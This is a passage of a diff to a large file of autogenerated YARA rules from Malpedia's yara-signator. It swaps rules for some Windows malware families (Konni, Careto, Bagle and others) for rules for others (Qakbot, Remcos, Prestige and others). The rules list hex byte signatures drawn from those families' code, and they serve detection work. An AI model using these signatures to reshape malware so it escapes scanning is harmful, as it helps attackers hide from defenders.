+		$sequence_3 = { c684249400000002 8b442448 8b08 8d542428 52 50 8b4120 }
+		$sequence_4 = { 8b9180000000 50 ffd2 8b442418 }
+		$sequence_5 = { 8b4e18 53 57 8bf8 8d5e04 83f908 7204 }
+		$sequence_6 = { ffd2 47 3b7c243c 897c2450 0f8c03feffff e9???????? 8b44241c }
+		$sequence_7 = { c744244400000000 a1???????? 8b500c b9???????? ffd2 8d7010 8974241c }
+		$sequence_8 = { f7e2 8bea c1ed06 45 68e8030000 }
+		$sequence_9 = { e8???????? 33f6 eb06 8b1d???????? b8???????? 8d5002 }
 
 	condition:
-		7 of them and filesize < 741376
+		7 of them and filesize < 1411072
 }
-rule MALPEDIA_Win_Unidentified_091_Auto : FILE
+rule MALPEDIA_Win_Prestige_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "43cbe43d-9747-5a0c-bb40-dd9c7c940d50"
+		id = "d7f375cd-3d34-546f-b2e4-9c5bb038ef3e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_091"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_091_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.prestige_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "4634e6f2999913eaf2a083116e36bae941dd940a5cf81991fb84c6cc55fc0d2d"
+		logic_hash = "2346660d21873b1b5b8cefaf9e99067a1424befc1ebf82fdd47e2c270ae4e270"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133317,34 +133100,34 @@ rule MALPEDIA_Win_Unidentified_091_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81e1ff00ff00 0bd1 895618 418b481c 8bd1 c1ca08 c1c108 }
-		$sequence_1 = { c0e904 8885f8000000 888df9000000 0fb64a1d 0fb6c1 c0e904 240f }
-		$sequence_2 = { e8???????? 85c0 743c 48ffc3 483b5c2430 72c4 488bcf }
-		$sequence_3 = { 8b442448 418bd1 4133d2 c1ca10 03fa 893c24 448bc7 }
-		$sequence_4 = { c1cd02 c1e718 418bc0 c1c005 4103c2 4489642418 03d0 }
-		$sequence_5 = { 85c0 0f8eee000000 488d0d49421600 48894d00 48215508 48215510 ffc0 }
-		$sequence_6 = { e8???????? 488bd3 488bcf 4c8bf0 8b30 c70000000000 e8???????? }
-		$sequence_7 = { f30f58d0 0f57c0 0fc6d200 0f51ca 410fc2d304 0fc2c104 0f5ed9 }
-		$sequence_8 = { 4c894507 48894d0f e9???????? c74424285a0a0000 ba50000000 4c89542420 41b966010000 }
-		$sequence_9 = { c784248000000001000000 eb32 c7442420f6010000 baa6000000 4c8d0db8a71100 b906000000 448d42fc }
+		$sequence_0 = { 83e920 e9???????? 83e920 e9???????? 83e904 e9???????? 83e93c }
+		$sequence_1 = { 0f86e4010000 85c0 7430 6bc809 8945f4 8bc3 2bc6 }
+		$sequence_2 = { e8???????? 51 68???????? 8d8dc0fcffff c645fc9f e8???????? 51 }
+		$sequence_3 = { e8???????? 51 68???????? 8d8d28fbffff c645fc8e e8???????? 51 }
+		$sequence_4 = { 0f9fc1 03ca 8b55ec 2bc2 3bc1 7ce0 6a0d }
+		$sequence_5 = { 68???????? 8d8d08faffff c645fc82 e8???????? 51 68???????? 8d8d20faffff }
+		$sequence_6 = { 8d55fc 6a0a ff7310 8d4de4 e8???????? 59 59 }
+		$sequence_7 = { 59 59 0f45fb eb6f 8845d8 8b01 8b501c }
+		$sequence_8 = { e8???????? 8bc6 c1e002 50 8b8598f8ffff 0fb70485bc534700 8d0485b84a4700 }
+		$sequence_9 = { 8bf0 8b4b2c 8b5330 3bce 7426 85d2 740f }
 
 	condition:
-		7 of them and filesize < 5777408
+		7 of them and filesize < 1518592
 }
-rule MALPEDIA_Win_Konni_Auto : FILE
+rule MALPEDIA_Win_Vobfus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f5f4e6b0-9bc7-5563-95be-e81e34e13947"
+		id = "42158425-a27c-57e2-bcf0-e9d26bb44ebe"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.konni_auto.yar#L1-L466"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vobfus_auto.yar#L1-L228"
 		license_url = "N/A"
-		logic_hash = "848a6314b768526873d5e9f7192d61992e122b75278ca60f0df452953ea07af0"
+		logic_hash = "c01a7c959701e62f162b2189e2ece4b76a685509f6980577800ff6467b1d208b"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -133356,73 +133139,46 @@ rule MALPEDIA_Win_Konni_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 50 8b45e8 0fb6cc 51 0fb6d0 52 }
-		$sequence_1 = { 85c0 7527 0fb655eb 0fb645ea }
-		$sequence_2 = { 03c0 334604 03c0 334608 03c0 33460c 03c0 }
-		$sequence_3 = { 83c418 8b45e4 50 ff15???????? }
-		$sequence_4 = { a1???????? 33c5 8945fc 8b0d???????? 8a15???????? 33c0 }
-		$sequence_5 = { 57 8b7d10 8985f4feffff 33f6 }
-		$sequence_6 = { 85c0 0f84f1000000 0f88eb000000 83f801 7508 }
-		$sequence_7 = { 7908 49 81c900ffffff 41 8a940df8feffff }
-		$sequence_8 = { 83f801 750a c705????????01000000 890d???????? }
-		$sequence_9 = { 33c9 83f802 7508 890d???????? }
-		$sequence_10 = { eb1e 83f804 740f c705????????02000000 }
-		$sequence_11 = { 6a01 ff15???????? 50 a3???????? }
-		$sequence_12 = { 68b6030000 6a0d 50 ff15???????? }
-		$sequence_13 = { 7508 890d???????? eb1e 83f804 }
-		$sequence_14 = { eb02 33c9 e8???????? 8bf8 }
-		$sequence_15 = { 68???????? ffd6 83c8ff 5f 5e 5b 8b4dfc }
-		$sequence_16 = { 0fb6591c 88581c 0fb6591d 88581d 0fb6591e }
-		$sequence_17 = { ffd6 8b4d08 51 ffd6 53 ffd6 }
-		$sequence_18 = { 68???????? 8d8df0faffff 51 ffd6 8b35???????? 8d95f0faffff }
-		$sequence_19 = { 8d8df8feffff 51 8d95f0fcffff 52 6a00 6a00 }
-		$sequence_20 = { 4c89742420 ff15???????? 488bd8 4885c0 744f }
-		$sequence_21 = { 8db768020000 8916 56 e8???????? 8a8c30dec44600 }
-		$sequence_22 = { 660f1f440000 498bc8 ba04000000 0f1f840000000000 0fb601 4883c104 48ffca }
-		$sequence_23 = { 8d8df4fdffff 51 ff15???????? 85c0 755b 57 }
-		$sequence_24 = { 52 6a00 6a00 ff15???????? 68d0070000 ff15???????? 8b4dfc }
-		$sequence_25 = { ff15???????? 8b3d???????? be0a000000 68e8030000 ffd7 }
-		$sequence_26 = { 6a00 8d8df8feffff 51 8d95f0fcffff }
-		$sequence_27 = { d3ea 33c9 56 e8???????? 8a8c30a6c44600 }
-		$sequence_28 = { e8???????? 8a8c30dec44600 5e bb01000000 83c604 d3e3 }
-		$sequence_29 = { 8a8664020000 8b9cae68020000 33d2 56 e8???????? 8a9435dec44600 5e }
-		$sequence_30 = { e8???????? 8a9435dec44600 5e 84c0 8bfa 7476 83ff03 }
-		$sequence_31 = { e8???????? 8a8c30a6c44600 5e 8b442414 03ca }
-		$sequence_32 = { ff15???????? 488bcb ff15???????? 488d8c24e0000000 33d2 }
-		$sequence_33 = { 57 6804010000 8d95f8feffff 52 }
-		$sequence_34 = { 488945c0 488d45b8 482bf0 6666666666660f1f840000000000 ba04000000 6666660f1f840000000000 0fb6040e }
-		$sequence_35 = { 33db 56 e8???????? 8a9c30c2c44600 5e 83f908 }
-		$sequence_36 = { 41b850000000 4533c9 488bd3 488bc8 c744242803000000 }
-		$sequence_37 = { 68???????? 8d95f8feffff 52 ffd6 6804010000 8d85f0fcffff 50 }
-		$sequence_38 = { bbedffffff 03dd 81eb00200200 83bd9404000000 899d94040000 }
-		$sequence_39 = { 8d3c85e0a30010 8bc3 80c901 83e01f 884d0b 8d34c0 8b07 }
-		$sequence_40 = { 8d0c9de0a30010 8d9080040000 8901 3bc2 7318 80600400 }
-		$sequence_41 = { bb???????? 7539 e8???????? 68???????? 53 }
-		$sequence_42 = { 4963cb 41ffc1 48ffc3 0fb6040c 8843ff 40883c0c }
-		$sequence_43 = { 80a0a0a1001000 40 41 41 3bc6 72bf }
-		$sequence_44 = { 4963ca 0fb6040c 4288040c 44881c0c 420fb60c0c 4103cb 81e1ff000080 }
-		$sequence_45 = { 7468 488d44246c 4c8d8c2480010000 4c8d442430 488d15b1190100 }
-		$sequence_46 = { 66c705????????0100 837e0811 7509 66c705????????0100 837e0856 7514 66833d????????01 }
-		$sequence_47 = { 8b348de0a30010 8d1c8de0a30010 8d3cc0 c1e702 03f7 837e0800 }
-		$sequence_48 = { 4c8bb42480180000 4c8ba42488180000 488bbc2490180000 4889742458 }
-		$sequence_49 = { 418bf1 8bea 458bda 418bc2 488d0c24 0f1f8000000000 8801 }
-		$sequence_50 = { 85c0 0f85e0feffff 488bbc2430010000 488b9c2420010000 4c8ba42438010000 }
+		$sequence_0 = { 8b5508 8b92e8000000 8b826c1a0000 50 }
+		$sequence_1 = { 8b5508 8b92e8000000 8b827c040000 50 }
+		$sequence_2 = { 8b5508 8b92e8000000 8b82d81a0000 50 }
+		$sequence_3 = { 8b5508 8b92e8000000 8b82f00b0000 50 }
+		$sequence_4 = { 8bec 8b5508 8b92e8000000 8b82a00d0000 50 50 8b10 }
+		$sequence_5 = { 8b82180b0000 50 50 8b10 ff5204 58 }
+		$sequence_6 = { 55 8bec 8b5508 8b92e8000000 8b82c4040000 50 }
+		$sequence_7 = { 8b5508 8b92e8000000 8b82b41a0000 50 }
+		$sequence_8 = { 78ff 0d50004900 3e3cff 46 }
+		$sequence_9 = { f2ed ec f2ed ec f3ed ebf2 ed }
+		$sequence_10 = { 801800 0808 0006 3401 41 06 1005???????? }
+		$sequence_11 = { f2e8fae6d5f6 d2b5f2bb8ff3 ae 73f3 }
+		$sequence_12 = { 5c f6ac4ff8b54ffb c058fcca 61 }
+		$sequence_13 = { 00e0 c9 8f00 e3ce 97 00e6 d39500e4d19b }
+		$sequence_14 = { d39500e4d19b 00cf c0b200d1c3b600 e6d3 a1???????? 00ec dea600e0d4b3 }
+		$sequence_15 = { 41 06 1001 ff06 0200 0100 }
+		$sequence_16 = { 91 00d5 c19400d6c49500d7 c59900dac999 00e0 }
+		$sequence_17 = { 06 1005???????? 0100 6c 74ff }
+		$sequence_18 = { 7cc8 dc7acd e291 d2e8 }
+		$sequence_19 = { 0100 8a00 0010 4c 0007 }
+		$sequence_20 = { 46 14ff 0470 fe0a }
+		$sequence_21 = { 6c 74ff 801800 0808 }
+		$sequence_22 = { ae 73f3 aa 5c f6ac4ff8b54ffb }
+		$sequence_23 = { 1400 48 0008 78ff 0d50004900 }
 
 	condition:
-		7 of them and filesize < 2361344
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Satellite_Turla_Auto : FILE
+rule MALPEDIA_Win_Tandfuy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db4c3339-c415-5711-a90e-cee07a736590"
+		id = "f7c34ec9-5c47-5400-953b-2fc065900f46"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.satellite_turla_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tandfuy_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "1f8986d8ff44bcaea791aed8e9d7780e6a84fb5d73ce994c684beebfa03d07bc"
+		logic_hash = "8bcf4f8924f2bd51984baf6f9c4aad50acc2f2e7396ee140bd5315db5dd99bae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133436,38 +133192,32 @@ rule MALPEDIA_Win_Satellite_Turla_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0108 833e00 7c1f 8b542410 }
-		$sequence_1 = { 0105???????? 81c3b0020000 2945e0 75ae 837dd400 }
-		$sequence_2 = { 0105???????? 83c410 29442418 75a9 }
-		$sequence_3 = { 0108 833e00 7fc7 db46fc }
-		$sequence_4 = { 0105???????? 83c410 29442420 75aa }
-		$sequence_5 = { 0108 833a00 7c23 8b442428 }
-		$sequence_6 = { 51 8d951cffffff 52 eb2b 8b4d20 }
-		$sequence_7 = { 0108 833e00 7cc7 7e39 }
-		$sequence_8 = { 66ab aa 8b3d???????? 8d85f0feffff 56 }
-		$sequence_9 = { ffd7 53 56 ff15???????? 6a02 53 56 }
-		$sequence_10 = { ff15???????? ff45fc 817dfc88130000 7cb7 }
-		$sequence_11 = { c645d205 c645d337 c645d418 c645d51d c645d614 c645d722 }
-		$sequence_12 = { e8???????? ff75fc 8945f8 53 50 e8???????? }
-		$sequence_13 = { 57 ffd6 a3???????? 6a71 8d45d0 }
-		$sequence_14 = { c645b816 c645b927 c645ba30 c645bb34 c645bc21 c645bd30 }
-		$sequence_15 = { 8d45c4 885dcf 50 57 }
+		$sequence_0 = { f2ae 8b442410 f7d1 49 51 8b4c2418 }
+		$sequence_1 = { 33c0 b9000a0000 50 50 }
+		$sequence_2 = { 50 e8???????? b93f000000 33c0 8dbdecfdffff f3ab 66ab }
+		$sequence_3 = { ff15???????? 8bd8 85db 0f84be000000 8d4c2408 6a00 }
+		$sequence_4 = { ff15???????? 50 ff15???????? 85c0 0f84ea000000 8d4c2424 }
+		$sequence_5 = { 33c0 c3 8b442408 50 ff15???????? }
+		$sequence_6 = { e8???????? 83c40c 85c0 766e }
+		$sequence_7 = { 33c0 f3a5 a4 b90a000000 }
+		$sequence_8 = { 51 e8???????? 83c418 8bd0 8995d4faffff 8db5f0fcffff 8bfb }
+		$sequence_9 = { 6800000080 56 f3ab ff15???????? 8bd8 }
 
 	condition:
-		7 of them and filesize < 1040384
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Unidentified_110_Auto : FILE
+rule MALPEDIA_Win_Crutch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cf62c553-12f9-5533-845c-44826d9d56b2"
+		id = "3e20e20b-31c5-5834-8ab6-1f56ddff6199"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_110"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_110_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crutch_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e61c3758e63fca434ff16788b9f2b50055e755cc5399fb0099b370350ca7876a"
+		logic_hash = "f4a23c9ddcadc5cf9e865fc280dcc92eecf1924dce5c0d12173bb5cf5ba3e418"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133481,34 +133231,34 @@ rule MALPEDIA_Win_Unidentified_110_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 753e 4c89f1 89da 4189e8 e8???????? 8a08 488b5040 }
-		$sequence_1 = { 4c89e0 48f7e1 4989c7 0f91c0 0f8050010000 88c3 48c1e306 }
-		$sequence_2 = { f0480fc11d???????? 8b05???????? 65488b0c2558000000 488b04c1 80b82001000000 7505 e8???????? }
-		$sequence_3 = { 48ffc8 4883f802 0f83ab000000 488bb42430010000 488d4e18 498b1424 e8???????? }
-		$sequence_4 = { e8???????? 0f1006 0f104e10 0f105620 0f119390000000 0f118b80000000 0f114370 }
-		$sequence_5 = { 4c89c1 e8???????? 4889c7 83ff01 7543 4889d9 ba2f000000 }
-		$sequence_6 = { 4c8d642448 49c7c6ffffffff 4c89e9 e8???????? 6683f801 0f85b6000000 89d5 }
-		$sequence_7 = { 4c8d0557060800 ba25000000 e8???????? 0f0b 56 4883ec20 488b31 }
-		$sequence_8 = { 4869cf48010000 4801c1 4883c108 48c741f801000000 41b840010000 4c89f2 e8???????? }
-		$sequence_9 = { 65488b0c2558000000 488b2cc1 0fb7b578010000 66c785780100000180 4889f9 4c89f2 e8???????? }
+		$sequence_0 = { 8b5608 50 52 e8???????? 50 68???????? 56 }
+		$sequence_1 = { c7861840000001000000 e8???????? 83c40c eb55 8b8608400000 68???????? 68???????? }
+		$sequence_2 = { 771d 0fb68938370210 ff248d30370210 8b148500810610 52 68???????? eb19 }
+		$sequence_3 = { 762d 8b4c2444 390f 7560 8bd1 56 52 }
+		$sequence_4 = { 51 e8???????? 83c404 85c0 740d c744245c2a000000 e9???????? }
+		$sequence_5 = { 33cc e8???????? 81c4a8090000 c3 663b742414 763a 8b4c2410 }
+		$sequence_6 = { 8b442428 8b742420 8b38 81c630050000 e8???????? 5f 5e }
+		$sequence_7 = { ff7580 e8???????? 83c404 6a01 6a2f 53 e8???????? }
+		$sequence_8 = { e9???????? 8b44240c 68???????? 50 e8???????? 83c408 e9???????? }
+		$sequence_9 = { 52 e8???????? 8bf0 83c408 85f6 750f 5e }
 
 	condition:
-		7 of them and filesize < 3217408
+		7 of them and filesize < 1067008
 }
-rule MALPEDIA_Win_Classfon_Auto : FILE
+rule MALPEDIA_Win_Qakbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a555a1ed-ff7a-5a40-964f-e4a3266a1aa9"
+		id = "e4d23f43-6680-5968-8ae5-2a0425f4dd3a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.classfon_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.qakbot_auto.yar#L1-L535"
 		license_url = "N/A"
-		logic_hash = "4a5e61a984c75da7dda5bee4683bb4bb3bc0f6865b6aa2b1e5cfe06d77a7200c"
+		logic_hash = "bc5a235576277933c27e5fa570e0287f83745ef4475cd2eb6f595916a62cbcba"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -133520,32 +133270,85 @@ rule MALPEDIA_Win_Classfon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f855c010000 8a442424 8d7c2424 84c0 742a 8b1d???????? a1???????? }
-		$sequence_1 = { 89be04020000 8b8600020000 3bc7 740e 83f8ff }
-		$sequence_2 = { 57 b985000000 33c0 8d7c240d c644240c00 f3ab 66ab }
-		$sequence_3 = { 53 56 8b35???????? 57 8bbc24dc070000 6800010000 8b07 }
-		$sequence_4 = { 7520 8b4350 6a04 6800200000 }
-		$sequence_5 = { 6a20 68ff010f00 6a00 8bd0 }
-		$sequence_6 = { 8bf0 3bf5 0f859d010000 8d4c241c 8d542424 51 8b4c2414 }
-		$sequence_7 = { 683f000f00 6a00 51 52 ff15???????? 8bf0 85f6 }
-		$sequence_8 = { 6a01 6800000080 57 ff15???????? 8b742418 83f8ff }
-		$sequence_9 = { 8b442418 8d4c2400 c744240000000000 51 68???????? }
+		$sequence_0 = { 33c0 7402 ebfa e8???????? }
+		$sequence_1 = { 7402 ebfa 33c0 7402 }
+		$sequence_2 = { 7402 ebfa eb06 33c0 }
+		$sequence_3 = { 50 e8???????? 8b06 47 59 }
+		$sequence_4 = { 59 59 6afb e9???????? }
+		$sequence_5 = { 740d 8d45fc 6a00 50 }
+		$sequence_6 = { 48 50 8d8534f6ffff 6a00 50 e8???????? }
+		$sequence_7 = { 50 e8???????? 59 59 6afe 58 }
+		$sequence_8 = { 8945fc e8???????? 8bf0 8d45fc 50 e8???????? }
+		$sequence_9 = { 33c0 e9???????? 33c0 7402 }
+		$sequence_10 = { 7402 ebfa e9???????? 6a00 }
+		$sequence_11 = { eb0b c644301c00 ff465c 8b465c }
+		$sequence_12 = { 7cef eb10 c644301c00 ff465c }
+		$sequence_13 = { e8???????? 83c410 33c0 7402 }
+		$sequence_14 = { 5e c9 c3 55 8bec 81ecc4090000 }
+		$sequence_15 = { 85c0 750a 33c0 7402 }
+		$sequence_16 = { 7507 c7466401000000 83f840 7507 }
+		$sequence_17 = { 837dfc00 750b 33c0 7402 }
+		$sequence_18 = { e8???????? e8???????? 33c0 7402 }
+		$sequence_19 = { 833d????????00 7508 33c0 7402 }
+		$sequence_20 = { c7466001000000 33c0 40 5e }
+		$sequence_21 = { 7402 ebfa 837d1000 7408 }
+		$sequence_22 = { 80ea80 8855f0 e8???????? 0fb64df7 }
+		$sequence_23 = { 83f841 7c05 83f85a 7eeb 83f861 }
+		$sequence_24 = { 7eeb 83f861 7c05 83f87a }
+		$sequence_25 = { e8???????? 833822 7505 83c8ff }
+		$sequence_26 = { 6a00 50 e8???????? 6a00 57 e8???????? }
+		$sequence_27 = { b301 eb0c 813800300000 b302 7202 }
+		$sequence_28 = { 7418 813800200000 7304 b301 eb0c }
+		$sequence_29 = { c1e81e 33448afc 69c06589076c 03c1 89048a ff82c0090000 81bac009000070020000 }
+		$sequence_30 = { ff10 85c0 750b ff15???????? e9???????? }
+		$sequence_31 = { 50 8d45d8 50 8d45d4 50 8d45ec 50 }
+		$sequence_32 = { 7507 e8???????? 8bc8 890d???????? }
+		$sequence_33 = { 83f801 7513 85c9 7507 e8???????? }
+		$sequence_34 = { 6a00 6800600900 6a00 ff15???????? a3???????? }
+		$sequence_35 = { e8???????? 33c0 c3 55 8bec 51 51 }
+		$sequence_36 = { 50 ff5508 8bf0 59 }
+		$sequence_37 = { 6a00 58 0f95c0 40 50 }
+		$sequence_38 = { c3 33c9 3d80000000 0f94c1 }
+		$sequence_39 = { 750c 57 ff15???????? 6afe 58 }
+		$sequence_40 = { 57 ff15???????? 33c0 85f6 0f94c0 }
+		$sequence_41 = { 57 6a00 6a02 ff15???????? 8bf8 83c8ff 3bf8 }
+		$sequence_42 = { 50 e8???????? 6a40 8d4590 }
+		$sequence_43 = { 56 e8???????? 83c40c 8d4514 50 }
+		$sequence_44 = { c7871002000001000000 8bc3 eb02 33c0 }
+		$sequence_45 = { e8???????? e8???????? e8???????? e8???????? 85c0 7405 e8???????? }
+		$sequence_46 = { eb13 488bd3 488bce ff15???????? }
+		$sequence_47 = { eb05 be01000000 488b15???????? 488b4d48 ff5220 488b15???????? }
+		$sequence_48 = { f7d9 eb03 4d8bda 4d8bc3 33d2 498d7b01 }
+		$sequence_49 = { e8???????? 6a00 8d45d4 50 68???????? }
+		$sequence_50 = { 5d c3 33c9 66890c46 }
+		$sequence_51 = { 8974240c 8a742431 80c63d 28d6 8874240b 69f60ea9c735 89742404 }
+		$sequence_52 = { 69f63c13b648 01f2 89442428 8954242c }
+		$sequence_53 = { 8955cc 74bf e9???????? 55 89e5 83ec08 c745fca1552064 }
+		$sequence_54 = { 0f4cc8 8b442408 890424 894c2404 8b4c2444 ffd1 83ec08 }
+		$sequence_55 = { 8b84248c000000 35fc387373 8b4c2470 01c1 }
+		$sequence_56 = { 57 85c0 0f8445010000 8b3d???????? }
+		$sequence_57 = { 66660f1f840000000000 8b4c9604 330c96 81e1ffffff7f }
+		$sequence_58 = { 8b442438 8b4c243c 8b11 83fa00 8944241c 894c2420 }
+		$sequence_59 = { c785f8f9ffff00000000 6a00 56 8bf9 e8???????? }
+		$sequence_60 = { 8b742418 8b7c241c f7d7 f7d6 89742418 }
+		$sequence_61 = { 7536 56 50 ff35???????? ff15???????? 8b85c0faffff 85c0 }
+		$sequence_62 = { 880c1a 8a4df3 324df3 884df3 83c301 8b55ec 39d3 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 4883456
 }
-rule MALPEDIA_Win_Careto_Auto : FILE
+rule MALPEDIA_Win_Termite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "57e5d9f7-b1a4-5fc9-9a67-0b8686d462cc"
+		id = "15b0d808-d79f-5784-bdde-fa38f9ed0952"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.careto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.careto_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.termite_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "e5dc00dd8daf311387d91262fca293d89a75fa8c242ab0cc183af2043a20f18b"
+		logic_hash = "3a2de453ce8083809c117db4d85515335282489c9c64cdb918c15a2c3d5282e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133559,32 +133362,32 @@ rule MALPEDIA_Win_Careto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895104 47 ff15???????? eb58 8d45ec 50 8d45f4 }
-		$sequence_1 = { eb1e ff7508 8d8568fbffff 50 }
-		$sequence_2 = { 85c0 0f850e020000 57 6a40 59 889ddcfdffff 8dbdddfdffff }
-		$sequence_3 = { 8b4b04 56 8b7308 8bc1 03f2 3bf0 8945fc }
-		$sequence_4 = { ff55e0 3bc6 8945e4 740b 3dea000000 0f85fd000000 8b7df4 }
-		$sequence_5 = { 7584 85ff 7407 57 ff15???????? 33c0 40 }
-		$sequence_6 = { 8b3d???????? be???????? 7579 ffd7 }
-		$sequence_7 = { a0???????? c3 e8???????? 84c0 740c 833d????????05 }
-		$sequence_8 = { 81ecb8080000 53 8b5d08 68???????? 53 c745e8d4070000 e8???????? }
-		$sequence_9 = { 7416 48 740c 83e804 754a 68???????? }
+		$sequence_0 = { 7e5e 8b45ec 8b4010 8945f0 c745f400000000 eb41 }
+		$sequence_1 = { 8b55f4 8b5204 891424 ffd0 8b4508 8b4010 }
+		$sequence_2 = { 8b45f4 89442408 8b450c 89442404 8b45f0 890424 e8???????? }
+		$sequence_3 = { 83f83f 771c 8b5508 8b45f4 899485f0feffff 8b85ecfeffff }
+		$sequence_4 = { 8945fc 8b4508 8b4004 3b45f8 7e06 837dfc00 75d7 }
+		$sequence_5 = { 8d85e4feffff 89442410 c744240c00000000 c744240800000000 8d85ecfeffff 89442404 891424 }
+		$sequence_6 = { 890424 e8???????? c745b044000000 c745dc00010000 8b45f4 8945f0 8b45f0 }
+		$sequence_7 = { c1e002 01d0 c1e002 05???????? c7400c00000000 8b55fc 89d0 }
+		$sequence_8 = { 890424 e8???????? 8b450c 8b400c c744240804000000 8d9568feffff }
+		$sequence_9 = { c7442404???????? 891c24 8944240c 8d45e1 }
 
 	condition:
-		7 of them and filesize < 94208
+		7 of them and filesize < 312320
 }
-rule MALPEDIA_Win_Bagle_Auto : FILE
+rule MALPEDIA_Win_Remcos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fe60543c-8794-58a6-ba42-981191e2cc82"
+		id = "3ceadbea-888c-55f4-a47d-fc201de9516f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bagle_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.remcos_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "eb49ea6ae472fea8285550f6b2bf1be9757590ced359fd50f12f529f0e70029d"
+		logic_hash = "53c8db12d7a75d44b5d7d131da62120ba8cecf14ac635a0e0b17a53e5078529b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133598,32 +133401,32 @@ rule MALPEDIA_Win_Bagle_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b03d f3aa 5b 5f }
